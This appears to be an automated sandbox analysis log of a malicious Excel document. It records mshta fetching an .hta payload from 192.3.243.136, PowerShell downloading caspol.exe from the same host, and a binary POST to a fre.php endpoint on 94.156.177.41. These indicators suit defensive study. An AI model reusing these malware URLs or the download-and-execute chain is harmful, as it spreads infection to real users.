Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_000007FE899C4B18 URLDownloadToFileW,

4_2_000007FE899C4B18

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\30ADB069.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.243.136Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.243.136If-Range: "2c850-6274dfb369376"
Source: global traffic	HTTP traffic detected: GET /55/caspol.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.243.136Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 20 Nov 2024 01:22:20 GMTConnection: Keep-AliveHost: 192.3.243.136If-None-Match: "2c850-6274dfb369376"

Source: mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: provit.uk

Source: unknown

HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:21:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:22:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:22:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:22:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:22:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:22:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:22:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:22:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:22:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 21 Nov 2024 00:22:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: mshta.exe, 00000003.00000003.435047316.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/
Source: powershell.exe, 00000004.00000002.458561358.0000000002471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.508901590.00000000027C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/55/caspol.e
Source: powershell.exe, 00000020.00000002.508901590.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.514413373.000000001A921000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/55/caspol.exe
Source: powershell.exe, 00000020.00000002.514413373.000000001A921000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/55/caspol.exehR
Source: powershell.exe, 00000004.00000002.458561358.0000000002471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.508901590.00000000027C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/55/caspol.exep
Source: mshta.exe, 00000003.00000003.435047316.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002F30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/G
Source: mshta.exe, 0000001B.00000003.496179630.0000000000347000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.502762634.0000000000347000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500554359.0000000000347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback
Source: mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430935543.000000000297D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430985156.0000000002980000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.428761225.00000000002BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436209780.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430968297.000000000297E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.496179630.0000000000320000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.502762634.000000000030F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500808839.0000000000364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500096632.0000000003040000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500554359.0000000000364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.502809223.0000000000365000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.499875594.000000000303D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500554359.000000000030F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.496179630.0000000000364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
Source: mshta.exe, 00000003.00000003.428761225.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436209780.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500808839.0000000000364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500554359.0000000000364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.502809223.0000000000365000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.502762634.00000000002FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.496179630.0000000000364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502662622.0000000000364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500554359.00000000002FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.496179630.00000000002FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta..
Source: mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.496179630.0000000000320000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.502762634.000000000030F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500554359.000000000030F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaC:
Source: mshta.exe, 00000003.00000002.436688638.0000000004B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htabK
Source: mshta.exe, 00000003.00000003.430819183.0000000002975000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.434304594.0000000002975000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500182672.0000000003035000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498539756.0000000003035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaht
Source: mshta.exe, 0000001B.00000003.496179630.0000000000320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htap
Source: mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htar
Source: mshta.exe, 00000003.00000003.430469990.0000000002F16000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.435076739.0000000002F16000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002F16000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003DBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003DBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003DBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003DBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
